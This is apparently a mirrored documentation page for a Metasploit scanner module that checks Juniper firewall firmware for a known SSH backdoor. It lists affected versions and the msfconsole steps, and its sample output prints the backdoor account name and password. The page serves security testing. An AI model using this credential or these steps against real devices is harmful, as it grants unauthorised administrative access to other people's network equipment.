Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md
Views: 11784
Vulnerable Application
Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.
A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): here
For verification purposes, an example vuln python script is also available here
Verification Steps
Install the application
Start msfconsole
Do:
use auxiliary/scanner/ssh/juniper_backdoor
Do:
set rhosts
Do:
run
You should see:
[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
Scenarios
Example run against a Juniper SSG5 with vuln firmware from above link.